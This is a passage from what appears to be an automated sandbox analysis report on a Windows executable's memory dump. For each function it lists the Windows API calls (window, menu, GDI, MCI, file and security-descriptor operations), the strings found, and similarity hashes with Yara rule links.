                                                                                                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 003CC4E6
                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 003CC4FD
                                                                                                                                                                      • GetDlgItem.USER32 ref: 003CC512
                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 003CC518
                                                                                                                                                                      • GetDlgItem.USER32 ref: 003CC528
                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 003CC52E
                                                                                                                                                                      • SendDlgItemMessageW.USER32 ref: 003CC54F
                                                                                                                                                                      • SendDlgItemMessageW.USER32 ref: 003CC569
                                                                                                                                                                      • GetWindowRect.USER32 ref: 003CC572
                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 003CC5DD
                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 003CC5E3
                                                                                                                                                                      • GetWindowRect.USER32 ref: 003CC5EA
                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 003CC636
                                                                                                                                                                      • GetClientRect.USER32 ref: 003CC643
                                                                                                                                                                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 003CC668
                                                                                                                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 003CC693
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3869813825-0
                                                                                                                                                                      • Opcode ID: c99710a8964825f043f9752cadb39936d6ad1e4f849cd5c630fd84c2234e20b2
                                                                                                                                                                      • Instruction ID: 13aba9dd075c478049a1e5b3cc8cd7253f3e1f8ddfada2d851c2db3c8c9fa1ed
                                                                                                                                                                      • Opcode Fuzzy Hash: c99710a8964825f043f9752cadb39936d6ad1e4f849cd5c630fd84c2234e20b2
                                                                                                                                                                      • Instruction Fuzzy Hash: E1515071900709AFDB229FA9DD85F6EBBB9FF04705F00452CE686E25A0CB75AD44CB50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003FA428, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 003FA4C8
                                                                                                                                                                      • DestroyWindow.USER32(00000000,?), ref: 003FA542
                                                                                                                                                                        • Part of subcall function 00377D2C: _memmove.LIBCMT ref: 00377D66
                                                                                                                                                                      • CreateWindowExW.USER32 ref: 003FA5BC
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 003FA5DE
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003FA5F1
                                                                                                                                                                      • DestroyWindow.USER32(00000000), ref: 003FA613
                                                                                                                                                                      • CreateWindowExW.USER32 ref: 003FA64A
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003FA663
                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 003FA67C
                                                                                                                                                                      • GetWindowRect.USER32 ref: 003FA683
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003FA69B
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 003FA6B3
                                                                                                                                                                        • Part of subcall function 003725DB: GetWindowLongW.USER32(?,000000EB), ref: 003725EC
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                                                      • String ID: 0$tooltips_class32
                                                                                                                                                                      • API String ID: 1297703922-3619404913
                                                                                                                                                                      • Opcode ID: e889023ab792c5c3c2fb3c1d7fef07398cf2b872744ce1f08feb1e6844e8e6ce
                                                                                                                                                                      • Instruction ID: 343bef867856b53d78bf725f0e95eecceba4b17d3f6c3f1b22039433dabf7f52
                                                                                                                                                                      • Opcode Fuzzy Hash: e889023ab792c5c3c2fb3c1d7fef07398cf2b872744ce1f08feb1e6844e8e6ce
                                                                                                                                                                      • Instruction Fuzzy Hash: 2A717BB1140609AFD726DF28CC45F767BE9EB88344F09452DFA89872A0D774E901CB66
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F4619, Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 003F46AB
                                                                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003F46F6
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BuffCharMessageSendUpper
                                                                                                                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                      • API String ID: 3974292440-4258414348
                                                                                                                                                                      • Opcode ID: e51db679ac27f662d14e1edf3705de38f0c3b667257d54e50b39545d6423b379
                                                                                                                                                                      • Instruction ID: 9bbdaf192b9d6f8202f2b4dde371b89e5a3a23b4c964e44968b620980debd6d4
                                                                                                                                                                      • Opcode Fuzzy Hash: e51db679ac27f662d14e1edf3705de38f0c3b667257d54e50b39545d6423b379
                                                                                                                                                                      • Instruction Fuzzy Hash: 5291BE342043059FCB16EF20C451B7AB7A5AF85314F04886DF99A5F7A2DB35ED4ACB81
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003FBAB8, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadImageW.USER32 ref: 003FBB6E
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,003F9431), ref: 003FBBCA
                                                                                                                                                                      • LoadImageW.USER32 ref: 003FBC03
                                                                                                                                                                      • LoadImageW.USER32 ref: 003FBC46
                                                                                                                                                                      • LoadImageW.USER32 ref: 003FBC7D
                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 003FBC89
                                                                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003FBC99
                                                                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?,003F9431), ref: 003FBCA8
                                                                                                                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 003FBCC5
                                                                                                                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 003FBCD1
                                                                                                                                                                        • Part of subcall function 0039313D: __wcsicmp_l.LIBCMT ref: 003931C6
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                                                                      • String ID: .dll$.exe$.icl
                                                                                                                                                                      • API String ID: 1212759294-1154884017
                                                                                                                                                                      • Opcode ID: 432ca290476649256fbc58e6898e074f32de55551ffef75846e28b7f27f1ccc7
                                                                                                                                                                      • Instruction ID: 5dcd9253ac5b7d86d86a77fe67ec6e90c6fbcaf367bb4a89b051846773b10840
                                                                                                                                                                      • Opcode Fuzzy Hash: 432ca290476649256fbc58e6898e074f32de55551ffef75846e28b7f27f1ccc7
                                                                                                                                                                      • Instruction Fuzzy Hash: AE6180B1500619BEEB16DF64CC85FBABBACEF08710F104116FE15DA1D0DB749954CBA0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003DA0B5, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 156COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadStringW.USER32(00000066,?,00000FFF,003FFB78), ref: 003DA0FC
                                                                                                                                                                        • Part of subcall function 00377F41: _memmove.LIBCMT ref: 00377F82
                                                                                                                                                                      • LoadStringW.USER32(?,?,00000FFF,?), ref: 003DA11E
                                                                                                                                                                      • __swprintf.LIBCMT ref: 003DA177
                                                                                                                                                                      • __swprintf.LIBCMT ref: 003DA190
                                                                                                                                                                      • _wprintf.LIBCMT ref: 003DA246
                                                                                                                                                                      • _wprintf.LIBCMT ref: 003DA264
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%@
                                                                                                                                                                      • API String ID: 311963372-320847661
                                                                                                                                                                      • Opcode ID: 39f5c3400565d590a2059bda9d10e3a1273ec0df13b7f6cbd5ca45d1798b2ce5
                                                                                                                                                                      • Instruction ID: 198214303498388fe365d51ccbcf2c5aa8a7208b68805f4db6dbff9aa8abfd5a
                                                                                                                                                                      • Opcode Fuzzy Hash: 39f5c3400565d590a2059bda9d10e3a1273ec0df13b7f6cbd5ca45d1798b2ce5
                                                                                                                                                                      • Instruction Fuzzy Hash: FD519172904609BACF27EBE0DE82EEEB778AF04300F204566F409761A1DB352F58DB51
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003DA5BD, Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00379997: __itow.LIBCMT ref: 003799C2
                                                                                                                                                                        • Part of subcall function 00379997: __swprintf.LIBCMT ref: 00379A0C
                                                                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 003DA636
                                                                                                                                                                      • GetDriveTypeW.KERNEL32 ref: 003DA683
                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003DA6CB
                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003DA702
                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003DA730
                                                                                                                                                                        • Part of subcall function 00377D2C: _memmove.LIBCMT ref: 00377D66
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                      • API String ID: 2698844021-4113822522
                                                                                                                                                                      • Opcode ID: c2fb04142061d2378b6a6c0b2658d268a8dcce8e9b17525e316870e644505038
                                                                                                                                                                      • Instruction ID: 259f1436043a44ec1b3eb5f0e07377a6233b56b795586b38864d1894a2044120
                                                                                                                                                                      • Opcode Fuzzy Hash: c2fb04142061d2378b6a6c0b2658d268a8dcce8e9b17525e316870e644505038
                                                                                                                                                                      • Instruction Fuzzy Hash: 4C518F711047049FC712EF20D98196AB7F8FF84718F54896EF8995B261DB35EE0ACB42
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003DA45A, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 003DA47A
                                                                                                                                                                      • __swprintf.LIBCMT ref: 003DA49C
                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 003DA4D9
                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 003DA4FE
                                                                                                                                                                      • _memset.LIBCMT ref: 003DA51D
                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 003DA559
                                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 003DA58E
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 003DA599
                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 003DA5A2
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 003DA5AC
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                                      • String ID: :$\$\??\%s
                                                                                                                                                                      • API String ID: 2733774712-3457252023
                                                                                                                                                                      • Opcode ID: 2479edade2a616a616e65bba0fb285fecaaaf092c37cb7ce25b0dbaf41b0cab4
                                                                                                                                                                      • Instruction ID: dddaeb515008f012275845a6de0f3e62b4b9d510f8ebda13d90efebf75f227b5
                                                                                                                                                                      • Opcode Fuzzy Hash: 2479edade2a616a616e65bba0fb285fecaaaf092c37cb7ce25b0dbaf41b0cab4
                                                                                                                                                                      • Instruction Fuzzy Hash: 6F318EB650011AABDB229FA0EC49FBB73BDEF89701F1041B6F909D6260E77096458B25
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003DDB04, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 003DDC7B
                                                                                                                                                                      • _wcscat.LIBCMT ref: 003DDC93
                                                                                                                                                                      • _wcscat.LIBCMT ref: 003DDCA5
                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003DDCBA
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 003DDCCE
                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 003DDCE6
                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 003DDD00
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 003DDD12
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                      • API String ID: 34673085-438819550
                                                                                                                                                                      • Opcode ID: 8d096157afc8e6832568abb4f4c6d4864e8136e1d99373755e6bb6d1752debd5
                                                                                                                                                                      • Instruction ID: df60a2a0e6ed911240b6af2cf13a6415e0cd150cdbc93fc28058f3a75e23ad6c
                                                                                                                                                                      • Opcode Fuzzy Hash: 8d096157afc8e6832568abb4f4c6d4864e8136e1d99373755e6bb6d1752debd5
                                                                                                                                                                      • Instruction Fuzzy Hash: BB8183725142419FCB26EF64D8859AAB7E8BF88314F15882FF88ACB350E735D944CB52
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003FC49C, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00372612: GetWindowLongW.USER32(?,000000EB), ref: 00372623
                                                                                                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003FC4EC
                                                                                                                                                                      • GetFocus.USER32(?,?,?,?), ref: 003FC4FC
                                                                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 003FC507
                                                                                                                                                                      • _memset.LIBCMT ref: 003FC632
                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 003FC65D
                                                                                                                                                                      • GetMenuItemCount.USER32 ref: 003FC67D
                                                                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 003FC690
                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 003FC6C4
                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 003FC70C
                                                                                                                                                                      • CheckMenuRadioItem.USER32 ref: 003FC744
                                                                                                                                                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 003FC779
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                                                                      • String ID: 0
                                                                                                                                                                      • API String ID: 1296962147-4108050209
                                                                                                                                                                      • Opcode ID: be24567f6ad3d7c1bbb14650ce635d8df75d4761456b21cbc7d54dc4a49ba1bd
                                                                                                                                                                      • Instruction ID: e5a1019e474353dfdbceb27bf3aacb99b7e97449644945dfb5f158b8a4532e14
                                                                                                                                                                      • Opcode Fuzzy Hash: be24567f6ad3d7c1bbb14650ce635d8df75d4761456b21cbc7d54dc4a49ba1bd
                                                                                                                                                                      • Instruction Fuzzy Hash: 54818C70258309AFD712DF14CA84A7BBBE8FF89314F01592DFA9997291D730D905CBA2
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C83F4, Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 003C874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 003C8766
                                                                                                                                                                        • Part of subcall function 003C874A: GetLastError.KERNEL32(?,003C822A,?,?,?), ref: 003C8770
                                                                                                                                                                        • Part of subcall function 003C874A: GetProcessHeap.KERNEL32(00000008,?,?,003C822A,?,?,?), ref: 003C877F
                                                                                                                                                                        • Part of subcall function 003C874A: HeapAlloc.KERNEL32(00000000,?,003C822A,?,?,?), ref: 003C8786
                                                                                                                                                                        • Part of subcall function 003C874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 003C879D
                                                                                                                                                                        • Part of subcall function 003C87E7: GetProcessHeap.KERNEL32(00000008,003C8240,00000000,00000000,?,003C8240,?), ref: 003C87F3
                                                                                                                                                                        • Part of subcall function 003C87E7: HeapAlloc.KERNEL32(00000000,?,003C8240,?), ref: 003C87FA
                                                                                                                                                                        • Part of subcall function 003C87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,003C8240,?), ref: 003C880B
                                                                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 003C8458
                                                                                                                                                                      • _memset.LIBCMT ref: 003C846D
                                                                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 003C848C
                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 003C849D
                                                                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 003C84DA
                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003C84F6
                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 003C8513
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 003C8522
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 003C8529
                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 003C854A
                                                                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 003C8551
                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 003C8582
                                                                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003C85A8
                                                                                                                                                                      • SetUserObjectSecurity.USER32 ref: 003C85BC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3996160137-0
                                                                                                                                                                      • Opcode ID: ac92b6ea38bf91ad901c9da59d536a73a4a334f18ac824127c5a259c30362728
                                                                                                                                                                      • Instruction ID: 78454fd702184259b3557035bd774de77e76e3cbc121f96b187f759ea91d8ce8
                                                                                                                                                                      • Opcode Fuzzy Hash: ac92b6ea38bf91ad901c9da59d536a73a4a334f18ac824127c5a259c30362728
                                                                                                                                                                      • Instruction Fuzzy Hash: C061367190021AAFDF029FA4DC45EAEBBB9FF09300F048169E915E7291DB719E15CF60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E762D, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDC.USER32(00000000), ref: 003E76A2
                                                                                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 003E76AE
                                                                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 003E76BA
                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 003E76C7
                                                                                                                                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 003E771B
                                                                                                                                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 003E7757
                                                                                                                                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 003E777B
                                                                                                                                                                      • SelectObject.GDI32(00000006,?), ref: 003E7783
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 003E778C
                                                                                                                                                                      • DeleteDC.GDI32(00000006), ref: 003E7793
                                                                                                                                                                      • ReleaseDC.USER32 ref: 003E779E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                      • String ID: (
                                                                                                                                                                      • API String ID: 2598888154-3887548279
                                                                                                                                                                      • Opcode ID: 21967d73f665496998169605d14961af6ae6431867c6708be66b73f70c6422fc
                                                                                                                                                                      • Instruction ID: 89cf1dbf6b63f13d36f2b27c737fd607f0095dd0b96396ad0c0b6cf66ab1c089
                                                                                                                                                                      • Opcode Fuzzy Hash: 21967d73f665496998169605d14961af6ae6431867c6708be66b73f70c6422fc
